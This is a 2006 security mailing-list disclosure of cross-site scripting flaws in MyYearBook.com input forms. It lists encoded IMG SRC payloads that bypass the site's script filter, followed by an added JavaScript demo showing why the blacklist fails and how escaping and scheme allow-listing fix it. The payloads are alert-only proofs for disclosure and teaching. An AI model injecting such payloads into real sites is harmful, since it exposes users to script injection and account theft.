Network Security Vuln-Dev

MyYearBook.com - XSS

Subject: MyYearBook.com - XSS
Date: 25 May 2006 23:21:25 -0000
MyYearBook.com - Personal community site like myspace.com

Affected files:

Input forms of:

editing profile
posting a blog
search boxes
posting a bulletin
posting a comment

---------------------------

XSS Vulnerabilities proof of concept:

When editing your profile, it seems <script> tags are filtered to <notallowed> 
tags, and "javascript" is filtered to the words "not allowed". To bypass this we 
can convert the script tags or the word "javascript" by using hex encoding. Below 
are examples of places where user-submitted data isn't properly 
filtered before being dynamically generated.


Profile input:

All the user has to do is put the following in any input box in his profile: 
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Blog subject input:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Photo caption input:

Same as above.
<IMG SRC="jav&#x09;ascript:alert('XSS');">


Any search box input:

"><IMG SRC="jav&#x09;ascript:alert('XSS');"><"

Posting a bulletin input:

In the message input box the following works:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Posting a comment:

<IMG SRC="jav   ascript:alert('XSS');">

Make sure tab is enabled.

------------------------------------------------

Luny - http://www.youfucktard.com
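The filter bypass described in the post above, as an added example that is not part of the original message and not MyYearBook's code. naiveFilter() is a reconstruction of the blacklist the post describes (rewrite <script> tags to <notallowed>, rewrite the word "javascript" to "not allowed"); the decoding and whitespace-stripping steps model what a browser does with an IMG SRC attribute value before it reads the URL scheme. The payload strings are the post's own proofs of concept, embedded as constants; the hardened handling at the end (output encoding plus a scheme allow-list) is the usual fix and is not something the post proposes.

```javascript
// Added example, not code from the original post or from MyYearBook.
// naiveFilter() is a reconstruction of the blacklist the post describes;
// the decoding steps model what a browser does with an IMG SRC attribute
// before it follows the URL.

// Constructed payloads, copied from the post's proof of concept.
const PAYLOAD_DECIMAL_ENTITIES =
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;" +
  "&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;";
const PAYLOAD_HEX_TAB = "jav&#x09;ascript:alert('XSS');";
const PAYLOAD_LITERAL_TAB = "jav\tascript:alert('XSS');";
const PAYLOAD_ATTR_BREAKOUT = "\"><IMG SRC=\"jav&#x09;ascript:alert('XSS');\"><\"";

// The blacklist as described: it only ever sees the raw, undecoded string.
function naiveFilter(input) {
  return input
    .replace(/<\s*\/?\s*script\b[^>]*>/gi, "<notallowed>")
    .replace(/javascript/gi, "not allowed");
}

// Browser step 1: numeric character references (&#106; or &#x6a;) inside an
// attribute value are decoded before the value is used as a URL.
function decodeNumericEntities(s) {
  return s.replace(/&#(?:x([0-9a-f]+)|([0-9]+));?/gi, (_, hex, dec) =>
    String.fromCodePoint(hex ? parseInt(hex, 16) : parseInt(dec, 10))
  );
}

// Browser step 2: ASCII tab, LF and CR are removed from a URL before the
// scheme is read, so "jav<TAB>ascript:" is still the javascript: scheme.
function canonicalizeUrl(raw) {
  return decodeNumericEntities(raw).replace(/[\t\n\r]/g, "").trim();
}

// The scheme the browser will actually dispatch on, or null for a relative URL.
function effectiveScheme(raw) {
  const m = canonicalizeUrl(raw).match(/^([a-z][a-z0-9+.-]*):/i);
  return m ? m[1].toLowerCase() : null;
}

// True when the blacklist leaves the payload untouched yet the browser still
// ends up with a javascript: URL. This is the bug the post demonstrates.
function bypassesNaiveFilter(payload) {
  return naiveFilter(payload) === payload && effectiveScheme(payload) === "javascript";
}

// Hardened handling: do not blacklist. Encode on output so user data can never
// form markup, and allow-list the scheme of anything emitted as a URL.
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

const SAFE_SCHEMES = new Set(["http", "https"]);

// Returns the attribute-safe SRC value, or "" when the scheme is not allowed.
// Relative URLs (no scheme) are accepted; the output is always entity-escaped.
function safeImageSrc(raw) {
  const url = canonicalizeUrl(raw);
  const scheme = effectiveScheme(raw);
  if (scheme !== null && !SAFE_SCHEMES.has(scheme)) return "";
  return htmlEscape(url);
}

for (const p of [PAYLOAD_DECIMAL_ENTITIES, PAYLOAD_HEX_TAB, PAYLOAD_LITERAL_TAB]) {
  console.log(JSON.stringify(p));
  console.log("  naive filter changes it:", naiveFilter(p) !== p);
  console.log("  browser scheme:", effectiveScheme(p));
  console.log("  hardened output:", JSON.stringify(safeImageSrc(p)));
}
console.log("attribute breakout, escaped:", htmlEscape(PAYLOAD_ATTR_BREAKOUT));
```

Run it with node. The point the loop makes is that the blacklist compares against the literal bytes it receives, while the browser decodes character references and discards tab/newline before deciding what scheme a URL has, so any check that does not first canonicalize the same way can be walked around. The search-box payload works differently: it closes the attribute and the tag, which is why htmlEscape() encodes quotes and angle brackets, not just the word "javascript".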
